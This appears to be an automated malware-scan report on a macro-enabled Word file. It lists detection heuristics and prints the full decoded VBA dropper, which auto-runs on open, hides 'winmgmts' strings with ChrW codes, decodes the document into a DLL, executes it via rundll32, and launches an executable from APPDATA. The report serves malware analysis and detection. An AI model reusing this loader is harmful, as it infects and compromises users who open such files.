Verdict: MALICIOUS
Risk Score: 318
Heuristics: 9
- ClamAV: Doc.Downloader.Trojan-bf70f023603538ee-bf70f023603538ee-9950269-0
  Severity: critical | Rule: CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Downloader.Trojan-bf70f023603538ee-bf70f023603538ee-9950269-0
- VBA project inside OOXML
  Severity: medium | Rule: OOXML_VBA | 5 related findings
  Document contains a VBA project — VBA macros present
- Obfuscated auto-exec VBA loader
  Severity: critical | Rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script:
  Set widraw = GetObject(ChrW(119) + ChrW(105) + ChrW(110) + ChrW(109) + ChrW(103) + ChrW(109) + ChrW(116) + ChrW(115) + ChrW(58) + ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) + ChrW(50) + ChrW(95) + ChrW(80) + ChrW(114) + ChrW(111) + ChrW(99) + ChrW(101) + ChrW(115) + ChrW(115))
- GetObject call
  Severity: high | Rule: OLE_VBA_GETOBJ
  Matched line in script:
  Set widraw = GetObject(ChrW(119) + ChrW(105) + ChrW(110) + ChrW(109) + ChrW(103) + ChrW(109) + ChrW(116) + ChrW(115) + ChrW(58) + ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) + ChrW(50) + ChrW(95) + ChrW(80) + ChrW(114) + ChrW(111) + ChrW(99) + ChrW(101) + ChrW(115) + ChrW(115))
- VBA p-code auto-exec with execution tokens
  Severity: high | Rule: OLE_VBA_PCODE_AUTOEXEC_EXEC
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro
  Severity: low | Rule: OLE_VBA_DOCOPEN
  Matched line in script:
  Private Sub Document_Open()
- Environ() call (env variable access)
  Severity: low | Rule: OLE_VBA_ENVIRON
  Matched line in script:
  strLine = Environ$("USERPROFILE") + "\TIQARgY"
- External relationship
  Severity: medium | Rule: OOXML_EXTERNAL_REL
  External target in word/_rels/settings.xml.rels: 1
- Embedded URL
  Severity: info | Rule: EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  Extracted URLs (each reached via an OOXML external relationship):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4970 bytes |

SHA-256: 0f11bfece78c23e1ca186ab2d56012109275551883d733d2ec57497e855f3abe

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private pid
Private strLine
Private widraw
Private strLine2 As String
Private DeDir As String
Private SeDir As String
Private IntVar As Long
Private IntVar2 As Long
Private ComName As String
Private Sub Document_Open()
Set widraw = GetObject(ChrW(119) + ChrW(105) + ChrW(110) + ChrW(109) + ChrW(103) + ChrW(109) + ChrW(116) + ChrW(115) + ChrW(58) + ChrW(87) & ChrW(105) & ChrW(110) & ChrW(51) + ChrW(50) + ChrW(95) + ChrW(80) + ChrW(114) + ChrW(111) + ChrW(99) + ChrW(101) + ChrW(115) + ChrW(115))
ComName = ChrW(67) + ChrW(79) + ChrW(77) + ChrW(80) + ChrW(85) + ChrW(84) + ChrW(69) + ChrW(82) + ChrW(78) + ChrW(65) + ChrW(77) + ChrW(69)
strLine = Environ$("USERPROFILE") + "\TIQARgY"
DeDir = ""
SeDir = ""
strLine2 = Environ$(ChrW(65) + ChrW(80) + ChrW(80) + ChrW(68) + ChrW(65) + ChrW(84) + ChrW(65)) + "\" + Environ$(ComName) + "\" + Environ$(ComName)
strLine = Environ$("USERPROFILE") + "\prjATM12"
ActiveDocument.SaveAs2 FileName:=strLine + ".doc", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".xls", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
widraw.create Right(ThisDocument.DefaultTargetFrame + " -decode ", 17) + strLine + ChrW(46) + ChrW(120) + ChrW(108) + ChrW(115) + " " + strLine + ".dll", Null, Null, processid
Do While DeDir = "" Or IntVar > 10
DeDir = Dir(strLine & ".dll")
Module2.Sleep 1000: IntVar = IntVar + 1
Loop
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
If Not DeDir = "" Then
widraw.create Right("cc85g78c89f799bcafb88a9eggebc6fag87rundll32 ", 9) + strLine & ".dll,EntryPoint", Null, Null, threadride
End If
ActiveDocument.SaveAs2 FileName:=strLine + ".doc", FileFormat:=wdFormatText, Encoding:=msoEncodingEBCDICIcelandic
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
If Dir(strLine2 & ".dll") = "" Then
Sleep 5000
If Dir(strLine2 & ".dll") = "" Then
Sleep 3000
widraw.create strLine2 & ".exe", Null, Null, threadride
Else
widraw.create strLine2 & ".exe", Null, Null, threadride
End If
Else
widraw.create strLine2 & ".exe", Null, Null, threadride
End If
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
ActiveDocument.SaveAs2 FileName:=strLine + ".pub", FileFormat:=wdFormatText
End Sub
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
#If VBA7 Then
Public Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal FUNC_ARG_RAND As Long) As Long
#Else
Public Declare Function Sleep Lib "Kernel32" (ByVal FUNC_ARG_RAND As Long) As Long
#End If

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 19456 bytes |

SHA-256: b31cf443f730c042a4c5798b0e2bf36e514022f41a499d574a2edef36b196c6c

Detection (ClamAV): Doc.Malware.Alien-9383770-0
Obfuscation or payload: unlikely